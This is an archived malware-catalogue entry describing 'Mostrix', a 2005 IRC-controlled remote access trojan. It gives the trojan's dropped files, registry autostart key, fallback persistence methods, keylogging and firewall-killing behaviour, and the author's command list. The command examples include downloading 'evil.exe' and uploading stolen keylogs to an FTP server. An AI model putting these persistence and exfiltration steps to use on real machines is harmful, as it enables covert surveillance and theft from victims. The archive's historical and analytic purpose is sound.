Archive A Reconstructed © MegaSecurity Database
Mostrix
Released 20 years, 10 months ago. June 2005
Copyright © MegaSecurity
By DiA
Informations
| Author | DiA |
| Family | Mostrix |
| Category | Remote Access |
| Version | Mostrix |
| Released Date | Jun 2005, 20 years, 10 months ago. |
Additional Information
Server:
dropped files:
c:\WINDOWS\MStr.exe Size: 10,240 bytes
c:\WINDOWS\mslog\070206.sys Size: 127 bytes
startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "MS.trix"
data: C:\WINDOWS\MStr.exe
attempts to connect to an IRC Server
tested on Windows XP
February 07, 2006
Author Information / Description
features:
- install itself into system with 4 methods:
> first try to copy to windows folder and do autostart registry entry
> if Mostrix can't write to registry it edit win.ini in windows folder
> if Mostrix can't write to windows directory it try's to copy itself
to startup folder
> if it can't copy to startup folder, it edit's autoexec.bat in C:\
- log every key event and foreground windows and save all log's
under current date .sys in windows directory under subdir "mslog"
- kill some favorite firewalls and internet security suites
- connect to irc.freenode.net and accept private commands in chan "mostrix"
- reconnect every half hour
commands:
- every command is only accepted at privat chat!
systeminfo 'temporary file path'
ae: systeminfo 'C:\info.txt'
> this command get some info about infected system and save it
in a temporary file...
dirlist 'directory to list' 'temporary file path'
ae: dirlist 'C:\' 'C:\C_drive_dirs.txt'
> this command list all sub directorys in a temporary file...
filelist 'directory to list' 'temporary file path'
ae: filelist 'C:\' 'C:\C_drive_files.txt'
> this command list all files in one directory and save it
in a temporary file...
delete 'file to delete'
ae: delete 'C:\C_drive_files.txt'
> this command delete's a file, just use it to remove your
temporary files...
execute 'application to execute'
ae: execute 'C:\Windows\Notepad.exe'
> this command executes a application, maybe one you downloaded
to the infected computer...
download 'http:// url file to download' 'save path'
ae: download 'http://server.com/user/evil.exe' 'C:\nice.exe'
> download's a file via http protocol to local infected computer...
upload 'file to upload' 'ftp server' 'user' 'password'
ae: upload 'C:\info.txt' 'server.com' 'user' 'drowssap'
> this command upload's a local file of infected computer
to your ftp server, name at ftp server is the same on disk...
steal a log:
Let's say you want a keylog from the 7. June 2005, just do so
(imaging "Windows" is the windows directory):
upload 'C:\Windows\mslog\070605.sys' 'server.com' 'user' 'pass'
DiA
This archive is an almost-complete reconstruction of the legendary Mega Security (also known as Kobayashi), a premier 90s-era "Trojan Database" where malware authors once showcased their work. After a decade offline, the site was brought back in August 2024 by its original creator, MasterRat, who authorized the Malware Gallery to host this modernized, searchable version of the collection. While the original site remains available for those seeking a nostalgic, old-school experience, we are proud to continue its legacy here. Full credit and thanks go to MasterRat and the retired Mega Security staff for their years of dedicated work in cataloging these historical samples.